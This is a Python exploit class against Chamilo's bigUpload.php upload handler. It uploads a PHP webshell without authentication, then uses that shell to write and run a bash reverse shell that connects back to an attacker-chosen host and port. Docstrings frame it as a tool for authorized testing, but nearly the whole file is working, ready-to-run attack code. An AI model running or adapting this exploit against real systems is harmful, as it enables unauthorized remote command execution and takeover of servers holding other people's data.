import requests
from typing import Union
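class ChamiloBigUploadExploit:
    """Unauthenticated file upload against Chamilo's ``bigUpload.php`` handler.

    ``send_webshell`` POSTs a PHP file to ``bigUpload.php?action=post-unsupported``;
    the handler stores it under ``main/inc/lib/javascript/bigupload/files/`` where it
    is then reachable over HTTP.  ``send_and_execute_revshell`` drives that webshell
    to write and start a bash reverse shell.

    Operational notes (authorized testing only):
    - The dropped webshell runs any ``?cmd=`` value for *anyone* who finds the URL.
      Use a non-guessable filename and remove the shell and the reverse-shell script
      once the engagement is over.
    - ``check_target_vulnerable`` is only a reachability heuristic; the upload itself
      is the authoritative test.
    """

    def __init__(self, url: str, timeout: Union[float, None] = 10.0) -> None:
        """
        Args:
            url: Base URL of the Chamilo instance, e.g. ``https://lms.example``
                (no trailing slash; it is used verbatim as a prefix).
            timeout: Per-request timeout in seconds handed to ``requests`` for the
                check and upload requests (``None`` disables it).  Without one a
                stalled target hangs the tool indefinitely.
        """
        self.root_url = url
        self.timeout = timeout
        # Directory the upload handler writes into; also the base of the webshell URL.
        self.check_url = f'{self.root_url}/main/inc/lib/javascript/bigupload/files/'
        # Attribute name kept (including its spelling) for existing callers.
        self.vunerable_endpoint = f'{self.root_url}/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

    @staticmethod
    def urlencode_all_characters(string: str) -> str:
        """Percent-encode every byte of ``string`` (UTF-8), not just reserved ones.

        Encoding everything lets shell metacharacters (``>``, ``&``, quotes, spaces)
        survive the query string untouched.  Encoding per UTF-8 byte replaces the
        earlier ``ord(char)`` formatting, which produced ``%e9`` for ``é`` and the
        malformed ``%1f600`` for a non-BMP character instead of one ``%XX`` per byte.
        ASCII input encodes exactly as before.
        """
        return ''.join(f'%{byte:02x}' for byte in string.encode('utf-8'))

    def check_target_vulnerable(self) -> bool:
        """Heuristic pre-check: is the bigupload ``files/`` directory reachable?

        Returns True only on HTTP 200.  This is a weak signal in both directions:
        a 200 shows the bigupload component is deployed, not that unauthenticated
        upload is enabled, and a 403 (directory listing disabled) does not mean the
        upload path is fixed.  Treat ``send_webshell`` as the real test.

        Raises:
            requests.RequestException: on network failure or timeout (not swallowed).
        """
        response = requests.get(self.check_url, timeout=self.timeout)
        return response.status_code == 200

    def send_webshell(self, filename: str) -> Union[str, bool]:
        """Upload a minimal PHP webshell stored as ``filename``.

        Args:
            filename: Name the file is saved under; it needs a ``.php`` extension
                for the server to execute it.

        Returns:
            The URL of the uploaded shell (``check_url`` + ``filename``) on success,
            or ``False`` when the server did not reply 200 with its exact success
            message.  (The earlier version returned a placeholder instead of the
            filename, so the returned URL never pointed at the shell.)

        The shell executes whatever arrives in ``?cmd=`` for any unauthenticated
        client; see the class docstring for cleanup expectations.
        """
        webshell_content = '<?php echo system($_GET["cmd"])?>'
        response = requests.post(
            self.vunerable_endpoint,
            files={'bigUploadFile': (filename, webshell_content)},
            timeout=self.timeout,
        )
        # The handler answers with this exact sentence on success; anything else
        # (error page, login redirect, WAF block) is treated as failure.
        if response.status_code == 200 and response.text == 'The file has successfully been uploaded.':
            return f'{self.check_url}{filename}'
        return False

    def send_and_execute_revshell(self, webshell_filename: str, bash_revshell_filename: str, host: str, port: int) -> bool:
        """Upload the webshell, then use it to write, chmod and run a bash reverse shell.

        Args:
            webshell_filename: Name for the PHP webshell (see ``send_webshell``).
            bash_revshell_filename: Path on the target where the script is written;
                a relative path resolves against the PHP worker's working directory.
            host: Listener address the target connects back to.
            port: Listener port.

        Returns:
            ``False`` if the webshell upload failed (previously that result was
            discarded and the commands were sent anyway) or a command did not
            return 200; ``True`` once all three commands were dispatched.  The final
            ``bash`` command blocks the PHP worker for as long as the reverse shell
            lives, so its request is expected to hit the 5 s timeout; a ReadTimeout
            is therefore counted as "dispatched", not as an error.  Confirm success
            on the listener rather than from this return value.
        """
        if not self.send_webshell(webshell_filename):
            return False
        bash_revshell_content = f'#!/bin/bash\nbash -i >& /dev/tcp/{host}/{port} 0>&1'
        # Every command is fully percent-encoded so shell metacharacters survive the
        # query string unchanged.
        commands = [
            self.urlencode_all_characters(f'echo -n "{bash_revshell_content}" > {bash_revshell_filename}'),
            self.urlencode_all_characters(f'chmod +x {bash_revshell_filename}'),
            self.urlencode_all_characters(f'bash {bash_revshell_filename}'),
        ]
        webshell_url = f'{self.check_url}{webshell_filename}'
        for command in commands:
            try:
                response = requests.get(f'{webshell_url}?cmd={command}', timeout=5)
            except requests.exceptions.ReadTimeout:
                # Expected for the blocking reverse-shell step; kept lenient for the
                # setup steps as well, matching the original behaviour.
                continue
            if response.status_code != 200:
                return False
        return True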